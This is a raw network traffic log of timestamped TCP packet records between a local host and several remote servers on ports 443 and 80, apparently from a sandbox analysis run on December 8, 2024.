Dec 8, 2024 13:31:19.987534046 CET	443	49733	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.987606049 CET	49733	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.987869024 CET	49733	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.987889051 CET	443	49733	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.988085032 CET	49733	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.988090992 CET	443	49733	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.988616943 CET	443	49735	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.988641024 CET	443	49735	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.988683939 CET	443	49735	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.988683939 CET	49735	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.988754988 CET	49735	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.990046978 CET	49737	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.990066051 CET	443	49737	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.990134001 CET	49737	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.990717888 CET	49735	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.990722895 CET	443	49735	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.990843058 CET	49735	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.990847111 CET	443	49735	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.992186069 CET	49737	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.992199898 CET	443	49737	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.993844986 CET	49738	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.993856907 CET	443	49738	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.993978024 CET	49738	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.994345903 CET	49739	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.994355917 CET	443	49739	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.994399071 CET	49739	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.994507074 CET	49739	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.994519949 CET	443	49739	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.995712996 CET	49740	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.995726109 CET	443	49740	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.995810032 CET	49740	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.995951891 CET	49738	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.995960951 CET	443	49738	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.996289968 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.996310949 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.996345997 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.996351957 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.996382952 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.996402025 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.996455908 CET	49740	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.996465921 CET	443	49740	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:20.003115892 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:20.003164053 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:20.005198002 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.005218983 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.005266905 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.005275965 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.005312920 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.007436991 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.007456064 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.007487059 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.007494926 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.007538080 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.007553101 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.011333942 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.011349916 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.011401892 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.011415005 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.011436939 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.011456966 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.018359900 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.018378019 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.018416882 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.018429041 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.018455029 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.018481016 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.024940968 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.024959087 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.024992943 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.025001049 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.025032997 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.025044918 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.026760101 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:20.026926994 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:20.028676987 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.028693914 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.028743029 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.028749943 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.028762102 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.028831959 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.029067039 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.029084921 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.029118061 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.029125929 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.029146910 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.029166937 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.037839890 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.037861109 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.037914038 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.037920952 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.037966013 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.039989948 CET	49741	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:20.040005922 CET	443	49741	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:20.040096998 CET	49741	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:20.040656090 CET	49741	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:20.040666103 CET	443	49741	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:20.048867941 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.048886061 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.048927069 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.048933029 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.048959970 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.048985004 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.049673080 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.049690962 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.049736977 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.049751997 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.049763918 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.049783945 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.057928085 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.057993889 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.058000088 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.058106899 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.075367928 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.075445890 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.075452089 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.075495958 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.096807003 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.096880913 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.096888065 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.096935987 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.112247944 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.112308979 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.112315893 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.112377882 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.127398014 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.127490044 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.127500057 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.127542973 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.138197899 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.138299942 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.138312101 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.138355970 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.146692991 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.146745920 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.146759987 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.146768093 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.146819115 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.147474051 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.147527933 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.147532940 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.147614956 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.149342060 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.149358988 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.149411917 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.149430037 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.149528027 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.149678946 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.149733067 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.149753094 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.149761915 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.149781942 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.149802923 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.150700092 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:20.150722027 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:20.151115894 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:20.151175976 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:20.151257992 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:20.155549049 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.155596018 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.155615091 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.155621052 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.155663013 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.158344984 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:20.158612967 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:20.158622980 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:20.166979074 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.166995049 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.167043924 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.167052031 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.167083025 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.167103052 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.168071985 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.168091059 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.168168068 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.168178082 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.168313026 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.169533968 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.169569969 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.169598103 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.169604063 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.169641972 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.172646046 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.172666073 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.172722101 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.172733068 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.172918081 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.182578087 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.182600021 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.182648897 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.182657957 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.182691097 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.182710886 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.185605049 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.185623884 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.185672998 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.185683012 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.185723066 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.187025070 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.187045097 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.187109947 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.187118053 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.187159061 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.188023090 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.188072920 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.188086987 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.188091993 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.188137054 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.188154936 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.196312904 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.196331978 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.196388960 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.196397066 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.196435928 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.198759079 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.198776960 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.198828936 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.198837996 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.198920965 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.203449965 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.203468084 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.203516960 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.203530073 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.203558922 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.203572989 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.207071066 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.207089901 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.207146883 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.207154989 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.207190037 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.207947016 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.207962990 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.208024979 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.208031893 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.208070040 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.209775925 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.209794044 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.209845066 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.209853888 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.209891081 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.217981100 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.218009949 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.218054056 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.218059063 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.218095064 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.218113899 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.219014883 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.219034910 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.219100952 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.219109058 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.219151020 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.220551968 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.220570087 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.220623970 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.220633030 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.220854998 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.225986958 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.226010084 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.226047993 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.226054907 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.226090908 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.226109982 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.230791092 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.230809927 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.230863094 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.230869055 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.230911016 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.231204033 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.231220961 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.231268883 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.231276035 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.231302977 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.231317997 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.246717930 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.246737003 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.246808052 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.246814966 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.246849060 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.248785019 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.248878002 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.248883963 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.249037981 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.260215044 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.260278940 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.260283947 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.260334015 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.268645048 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.268733978 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.268738985 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.268774033 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.276290894 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.276357889 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.276364088 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.276443958 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.285942078 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.286015034 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.286020994 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.286062002 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.293275118 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.293375015 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.293380022 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.293430090 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.300640106 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.300726891 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.300731897 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.300764084 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.310208082 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.310275078 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.310280085 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.310328960 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.317837000 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.317902088 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.317907095 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.317965984 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.325936079 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.326011896 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.326016903 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.326083899 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.331520081 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.331537962 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.331612110 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.331624031 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.331677914 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.332803011 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.332827091 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.332869053 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.332876921 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.332907915 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.332926035 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.333183050 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.333245993 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.333250046 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.333389997 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.334192038 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.334212065 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.334281921 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.334287882 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.334331036 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.334352970 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.341929913 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.341959000 CET	443	49728	150.171.27.10	192.168.2.6
